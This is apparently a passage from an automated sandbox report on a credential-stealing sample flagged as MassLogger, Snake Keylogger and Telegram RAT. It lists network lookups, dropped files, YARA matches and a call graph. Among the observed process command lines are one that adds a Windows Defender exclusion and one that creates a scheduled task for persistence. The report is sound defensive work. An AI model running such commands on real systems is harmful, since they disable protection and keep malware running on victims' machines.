                                                                                                                              X-Request-ID: 3ab50409a75eda3ee0577838cee641c4
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                              Nov 25, 2024 13:39:27.310360909 CET127OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Nov 25, 2024 13:39:27.709492922 CET320INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 12:39:27 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 103
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: ddd266514e2e60fbea15b6718d94289b
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.549724172.67.177.1344432200C:\Users\user\AppData\Local\Temp\server01.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-25 12:39:30 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-25 12:39:30 UTC851INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 12:39:30 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 361
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 502279
                                                                                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=quvUg76WeW2Ppn1irLt49XwSIKLNdic72bmcZg26b49%2Fx3BOAfKz9C7RHc%2BSvE7M91meBksLBd2dUoxmOYYeUZZa2LBvS8tA0AHfc78eW3pP38X6gMPatwzjYHGYloNqSEDPC%2Faa"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e81b3adaf750c8e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1664&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1738095&cwnd=181&unsent_bytes=0&cid=e6013bf929d7f9c8&ts=497&x=0"
                                                                                                                              2024-11-25 12:39:30 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:1
                                                                                                                              Start time:07:39:19
                                                                                                                              Start date:25/11/2024
                                                                                                                              Path:C:\Users\user\Desktop\F7Xu8bRnXT.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\F7Xu8bRnXT.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:354'304 bytes
                                                                                                                              MD5 hash:D023BB01175D237F56D56467E5806525
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.2245104085.00000000034F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.2245341110.0000000004AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.2244099849.0000000002214000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.2221472933.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.2245462797.0000000005110000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:2
                                                                                                                              Start time:07:39:22
                                                                                                                              Start date:25/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                              Imagebase:0xf10000
                                                                                                                              File size:70'656 bytes
                                                                                                                              MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 79%, ReversingLabs
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:3
                                                                                                                              Start time:07:39:22
                                                                                                                              Start date:25/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\server01.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\server01.exe"
                                                                                                                              Imagebase:0x4e0000
                                                                                                                              File size:98'304 bytes
                                                                                                                              MD5 hash:0CDBE0CD3CB5C2F0B2CB17E4417D43F5
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3486443994.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: unknown
                                                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Florian Roth
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 79%, ReversingLabs
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              Target ID:4
                                                                                                                              Start time:07:39:24
                                                                                                                              Start date:25/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                              Imagebase:0xbb0000
                                                                                                                              File size:433'152 bytes
                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:5
                                                                                                                              Start time:07:39:24
                                                                                                                              Start date:25/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:6
                                                                                                                              Start time:07:39:24
                                                                                                                              Start date:25/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:44 /du 23:59 /sc daily /ri 1 /f
                                                                                                                              Imagebase:0x850000
                                                                                                                              File size:187'904 bytes
                                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:7
                                                                                                                              Start time:07:39:25
                                                                                                                              Start date:25/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:8
                                                                                                                              Start time:07:39:28
                                                                                                                              Start date:25/11/2024
                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                              Imagebase:0x7ff6ef0c0000
                                                                                                                              File size:496'640 bytes
                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:11
                                                                                                                              Start time:07:40:00
                                                                                                                              Start date:25/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                                                                                                                              Imagebase:0x410000
                                                                                                                              File size:665'670'656 bytes
                                                                                                                              MD5 hash:DE61BDDC20CC8EBAC6B7BDC55517BB73
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:5.3%
                                                                                                                                Dynamic/Decrypted Code Coverage:0.6%
                                                                                                                                Signature Coverage:5.2%
                                                                                                                                Total number of Nodes:1237
                                                                                                                                Total number of Limit Nodes:46
                                                                                                                                execution_graph 14043 21898a8 14044 21898e8 CloseHandle 14043->14044 14046 2189919 14044->14046 14047 2189620 14049 2189633 14047->14049 14051 21896d0 14049->14051 14052 2189718 VirtualProtect 14051->14052 14054 21896b7 14052->14054 14055 40cbdd 14056 40cbe9 __fsopen 14055->14056 14090 40d534 HeapCreate 14056->14090 14059 40cc46 14092 41087e GetModuleHandleW 14059->14092 14063 40cc57 __RTC_Initialize 14126 411a15 14063->14126 14064 40cbb4 _fast_error_exit 63 API calls 14064->14063 14066 40cc66 14067 40cc72 GetCommandLineA 14066->14067 14266 40e79a 14066->14266 14141 412892 14067->14141 14074 40cc97 14180 41255f 14074->14180 14076 40e79a __amsg_exit 63 API calls 14076->14074 14078 40cca8 14195 40e859 14078->14195 14079 40e79a __amsg_exit 63 API calls 14079->14078 14081 40ccb0 14082 40e79a __amsg_exit 63 API calls 14081->14082 14084 40ccbb 14081->14084 14082->14084 14201 4019f0 OleInitialize 14084->14201 14085 40ccd8 14086 40ccea 14085->14086 14255 40ea0a 14085->14255 14273 40ea36 14086->14273 14089 40ccef __fsopen 14091 40cc3a 14090->14091 14091->14059 14258 40cbb4 14091->14258 14093 410892 14092->14093 14094 410899 14092->14094 14276 40e76a 14093->14276 14096 410a01 14094->14096 14097 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14094->14097 14335 410598 14096->14335 14100 4108ec TlsAlloc 14097->14100 14102 40cc4c 14100->14102 14103 41093a TlsSetValue 14100->14103 14102->14063 14102->14064 14103->14102 14104 41094b 14103->14104 14280 40ea54 14104->14280 14109 41046e __encode_pointer 6 API calls 14110 41096b 14109->14110 14111 41046e __encode_pointer 6 API calls 14110->14111 14112 41097b 14111->14112 14113 41046e __encode_pointer 6 API calls 14112->14113 14114 41098b 14113->14114 14297 40d564 14114->14297 14121 4104e9 __decode_pointer 6 API calls 14122 4109df 14121->14122 14122->14096 14123 4109e6 14122->14123 14317 4105d5 14123->14317 14125 4109ee GetCurrentThreadId 14125->14102 14641 40e1d8 14126->14641 14128 411a21 GetStartupInfoA 14129 411cba __calloc_crt 63 API calls 14128->14129 14131 411a42 14129->14131 14130 411c60 __fsopen 14130->14066 14131->14130 14132 411ba7 14131->14132 14135 411cba __calloc_crt 63 API calls 14131->14135 14138 411b2a 14131->14138 14132->14130 14133 411bdd GetStdHandle 14132->14133 14134 411c42 SetHandleCount 14132->14134 14136 411bef GetFileType 14132->14136 14139 41389c __mtinitlocknum InitializeCriticalSectionAndSpinCount 14132->14139 14133->14132 14134->14130 14135->14131 14136->14132 14137 411b53 GetFileType 14137->14138 14138->14130 14138->14132 14138->14137 14140 41389c __mtinitlocknum InitializeCriticalSectionAndSpinCount 14138->14140 14139->14132 14140->14138 14142 4128b0 GetEnvironmentStringsW 14141->14142 14143 4128cf 14141->14143 14144 4128c4 GetLastError 14142->14144 14145 4128b8 14142->14145 14143->14145 14149 412968 14143->14149 14144->14143 14146 4128eb GetEnvironmentStringsW 14145->14146 14147 4128fa WideCharToMultiByte 14145->14147 14146->14147 14151 40cc82 14146->14151 14154 41295d FreeEnvironmentStringsW 14147->14154 14155 41292e 14147->14155 14148 412971 GetEnvironmentStrings 14148->14151 14152 412981 14148->14152 14149->14148 14149->14151 14167 4127d7 14151->14167 14156 411c75 __malloc_crt 63 API calls 14152->14156 14154->14151 14157 411c75 __malloc_crt 63 API calls 14155->14157 14158 41299b 14156->14158 14159 412934 14157->14159 14160 4129a2 FreeEnvironmentStringsA 14158->14160 14161 4129ae _memcpy_s 14158->14161 14159->14154 14162 41293c WideCharToMultiByte 14159->14162 14160->14151 14165 4129b8 FreeEnvironmentStringsA 14161->14165 14163 412956 14162->14163 14164 41294e 14162->14164 14163->14154 14166 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14164->14166 14165->14151 14166->14163 14168 4127f1 GetModuleFileNameA 14167->14168 14169 4127ec 14167->14169 14171 412818 14168->14171 14648 41446b 14169->14648 14642 41263d 14171->14642 14174 40cc8c 14174->14074 14174->14076 14175 412854 14176 411c75 __malloc_crt 63 API calls 14175->14176 14177 41285a 14176->14177 14177->14174 14178 41263d _parse_cmdline 73 API calls 14177->14178 14179 412874 14178->14179 14179->14174 14181 412568 14180->14181 14182 41256d _strlen 14180->14182 14183 41446b ___initmbctable 107 API calls 14181->14183 14184 40cc9d 14182->14184 14185 411cba __calloc_crt 63 API calls 14182->14185 14183->14182 14184->14078 14184->14079 14190 4125a2 _strlen 14185->14190 14186 412600 14187 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14186->14187 14187->14184 14188 411cba __calloc_crt 63 API calls 14188->14190 14189 412626 14191 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14189->14191 14190->14184 14190->14186 14190->14188 14190->14189 14192 40ef42 _strcpy_s 63 API calls 14190->14192 14193 4125e7 14190->14193 14191->14184 14192->14190 14193->14190 14194 40e61c __invoke_watson 10 API calls 14193->14194 14194->14193 14196 40e867 __IsNonwritableInCurrentImage 14195->14196 15059 413586 14196->15059 14198 40e885 __initterm_e 14200 40e8a4 __IsNonwritableInCurrentImage __initterm 14198->14200 15063 40d2bd 14198->15063 14200->14081 14202 401ab9 14201->14202 15163 40b99e 14202->15163 14204 401abf 14205 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 14204->14205 14235 402467 14204->14235 14206 401dc3 CloseHandle GetModuleHandleA 14205->14206 14214 401c55 14205->14214 15176 401650 14206->15176 14208 401e8b FindResourceA LoadResource LockResource SizeofResource 14209 40b84d _malloc 63 API calls 14208->14209 14210 401ebf 14209->14210 15178 40af66 14210->15178 14212 401c9c CloseHandle 14212->14085 14213 401ecb _memset 14215 401efc SizeofResource 14213->14215 14214->14212 14218 401cf9 Module32Next 14214->14218 14216 401f1c 14215->14216 14217 401f5f 14215->14217 14216->14217 15216 401560 14216->15216 14219 401f92 _memset 14217->14219 14221 401560 __VEC_memcpy 14217->14221 14218->14206 14226 401d0f 14218->14226 14222 401fa2 FreeResource 14219->14222 14221->14219 14223 40b84d _malloc 63 API calls 14222->14223 14224 401fbb SizeofResource 14223->14224 14225 401fe5 _memset 14224->14225 14227 4020aa LoadLibraryA 14225->14227 14226->14212 14230 401dad Module32Next 14226->14230 14228 401650 14227->14228 14229 40216c GetProcAddress 14228->14229 14231 4021aa 14229->14231 14229->14235 14230->14206 14230->14226 14231->14235 15190 4018f0 14231->15190 14233 40243f 14234 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14233->14234 14233->14235 14234->14235 14235->14085 14236 4021f1 14236->14233 15202 401870 14236->15202 14238 402269 VariantInit 14239 401870 76 API calls 14238->14239 14240 40228b VariantInit 14239->14240 14241 4022a7 14240->14241 14242 4022d9 SafeArrayCreate SafeArrayAccessData 14241->14242 15207 40b350 14242->15207 14245 40232c 14246 402354 SafeArrayDestroy 14245->14246 14247 40235b 14245->14247 14246->14247 14248 402392 SafeArrayCreateVector 14247->14248 14249 4023a4 14248->14249 14250 4023bc VariantClear VariantClear 14249->14250 15209 4019a0 14250->15209 14253 40242e 14254 4019a0 66 API calls 14253->14254 14254->14233 15473 40e8de 14255->15473 14257 40ea1b 14257->14086 14259 40cbc2 14258->14259 14260 40cbc7 14258->14260 14261 40ec4d __FF_MSGBANNER 63 API calls 14259->14261 14262 40eaa2 __NMSG_WRITE 63 API calls 14260->14262 14261->14260 14263 40cbcf 14262->14263 14264 40e7ee __mtinitlocknum 4 API calls 14263->14264 14265 40cbd9 14264->14265 14265->14059 14267 40ec4d __FF_MSGBANNER 63 API calls 14266->14267 14268 40e7a4 14267->14268 14269 40eaa2 __NMSG_WRITE 63 API calls 14268->14269 14270 40e7ac 14269->14270 14271 4104e9 __decode_pointer 6 API calls 14270->14271 14272 40cc71 14271->14272 14272->14067 14274 40e8de _doexit 63 API calls 14273->14274 14275 40ea41 14274->14275 14275->14089 14277 40e775 Sleep GetModuleHandleW 14276->14277 14278 40e793 14277->14278 14279 40e797 14277->14279 14278->14277 14278->14279 14279->14094 14341 4104e0 14280->14341 14282 40ea5c __init_pointers __initp_misc_winsig 14344 41393d 14282->14344 14285 41046e __encode_pointer 6 API calls 14286 40ea98 14285->14286 14287 41046e TlsGetValue 14286->14287 14288 4104a7 GetModuleHandleW 14287->14288 14289 410486 14287->14289 14291 4104c2 GetProcAddress 14288->14291 14292 4104b7 14288->14292 14289->14288 14290 410490 TlsGetValue 14289->14290 14294 41049b 14290->14294 14296 41049f 14291->14296 14293 40e76a __crt_waiting_on_module_handle 2 API calls 14292->14293 14295 4104bd 14293->14295 14294->14288 14294->14296 14295->14291 14295->14296 14296->14109 14298 40d56f 14297->14298 14299 40d59d 14298->14299 14347 41389c 14298->14347 14299->14096 14301 4104e9 TlsGetValue 14299->14301 14302 410501 14301->14302 14303 410522 GetModuleHandleW 14301->14303 14302->14303 14306 41050b TlsGetValue 14302->14306 14304 410532 14303->14304 14305 41053d GetProcAddress 14303->14305 14307 40e76a __crt_waiting_on_module_handle 2 API calls 14304->14307 14308 41051a 14305->14308 14310 410516 14306->14310 14309 410538 14307->14309 14308->14096 14311 411cba 14308->14311 14309->14305 14309->14308 14310->14303 14310->14308 14313 411cc3 14311->14313 14314 4109c5 14313->14314 14315 411ce1 Sleep 14313->14315 14352 40e231 14313->14352 14314->14096 14314->14121 14316 411cf6 14315->14316 14316->14313 14316->14314 14620 40e1d8 14317->14620 14319 4105e1 GetModuleHandleW 14320 4105f1 14319->14320 14321 4105f7 14319->14321 14322 40e76a __crt_waiting_on_module_handle 2 API calls 14320->14322 14323 410633 14321->14323 14324 41060f GetProcAddress GetProcAddress 14321->14324 14322->14321 14325 40d6e0 __lock 59 API calls 14323->14325 14324->14323 14326 410652 InterlockedIncrement 14325->14326 14621 4106aa 14326->14621 14329 40d6e0 __lock 59 API calls 14330 410673 14329->14330 14624 4145d2 InterlockedIncrement 14330->14624 14332 410691 14636 4106b3 14332->14636 14334 41069e __fsopen 14334->14125 14336 4105a2 14335->14336 14340 4105ae 14335->14340 14339 4104e9 __decode_pointer 6 API calls 14336->14339 14337 4105d0 14337->14337 14338 4105c2 TlsFree 14338->14337 14339->14340 14340->14337 14340->14338 14342 41046e __encode_pointer 6 API calls 14341->14342 14343 4104e7 14342->14343 14343->14282 14345 41046e __encode_pointer 6 API calls 14344->14345 14346 40ea8e 14345->14346 14346->14285 14351 40e1d8 14347->14351 14349 4138a8 InitializeCriticalSectionAndSpinCount 14350 4138ec __fsopen 14349->14350 14350->14298 14351->14349 14353 40e23d __fsopen 14352->14353 14354 40e255 14353->14354 14364 40e274 _memset 14353->14364 14365 40bfc1 14354->14365 14358 40e2e6 HeapAlloc 14358->14364 14359 40e26a __fsopen 14359->14313 14364->14358 14364->14359 14371 40d6e0 14364->14371 14378 40def2 14364->14378 14384 40e32d 14364->14384 14387 40d2e3 14364->14387 14390 4106bc GetLastError 14365->14390 14367 40bfc6 14368 40e744 14367->14368 14369 4104e9 __decode_pointer 6 API calls 14368->14369 14370 40e754 __invoke_watson 14369->14370 14372 40d6f5 14371->14372 14373 40d708 EnterCriticalSection 14371->14373 14415 40d61d 14372->14415 14373->14364 14375 40d6fb 14375->14373 14376 40e79a __amsg_exit 62 API calls 14375->14376 14377 40d707 14376->14377 14377->14373 14380 40df20 14378->14380 14379 40dfc2 14379->14364 14380->14379 14383 40dfb9 14380->14383 14608 40da59 14380->14608 14383->14379 14615 40db09 14383->14615 14619 40d606 LeaveCriticalSection 14384->14619 14386 40e334 14386->14364 14388 4104e9 __decode_pointer 6 API calls 14387->14388 14389 40d2f3 14388->14389 14389->14364 14404 410564 TlsGetValue 14390->14404 14393 410729 SetLastError 14393->14367 14394 411cba __calloc_crt 60 API calls 14395 4106e7 14394->14395 14395->14393 14396 4104e9 __decode_pointer 6 API calls 14395->14396 14397 410701 14396->14397 14398 410720 14397->14398 14399 410708 14397->14399 14409 40b6b5 14398->14409 14400 4105d5 __initptd 60 API calls 14399->14400 14402 410710 GetCurrentThreadId 14400->14402 14402->14393 14403 410726 14403->14393 14405 410594 14404->14405 14406 410579 14404->14406 14405->14393 14405->14394 14407 4104e9 __decode_pointer 6 API calls 14406->14407 14408 410584 TlsSetValue 14407->14408 14408->14405 14410 40b6c1 __fsopen 14409->14410 14411 40b73d __fsopen 14410->14411 14412 40b714 HeapFree 14410->14412 14411->14403 14412->14411 14413 40b727 14412->14413 14414 40bfc1 __filbuf 62 API calls 14413->14414 14414->14411 14416 40d629 __fsopen 14415->14416 14430 40d64f 14416->14430 14441 40ec4d 14416->14441 14418 40d65f __fsopen 14418->14375 14423 40d680 14427 40d6e0 __lock 63 API calls 14423->14427 14424 40d671 14426 40bfc1 __filbuf 63 API calls 14424->14426 14426->14418 14429 40d687 14427->14429 14431 40d6bb 14429->14431 14432 40d68f 14429->14432 14430->14418 14487 411c75 14430->14487 14433 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14431->14433 14434 41389c __mtinitlocknum InitializeCriticalSectionAndSpinCount 14432->14434 14435 40d6ac 14433->14435 14436 40d69a 14434->14436 14492 40d6d7 14435->14492 14436->14435 14438 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 14436->14438 14439 40d6a6 14438->14439 14440 40bfc1 __filbuf 63 API calls 14439->14440 14440->14435 14495 413d5b 14441->14495 14444 40ec61 14445 40eaa2 __NMSG_WRITE 63 API calls 14444->14445 14448 40d63e 14444->14448 14447 40ec79 14445->14447 14446 413d5b __set_error_mode 63 API calls 14446->14444 14449 40eaa2 __NMSG_WRITE 63 API calls 14447->14449 14450 40eaa2 14448->14450 14449->14448 14451 40eab6 14450->14451 14452 413d5b __set_error_mode 60 API calls 14451->14452 14483 40d645 14451->14483 14453 40ead8 14452->14453 14454 40ec16 GetStdHandle 14453->14454 14456 413d5b __set_error_mode 60 API calls 14453->14456 14455 40ec24 _strlen 14454->14455 14454->14483 14459 40ec3d WriteFile 14455->14459 14455->14483 14457 40eae9 14456->14457 14457->14454 14458 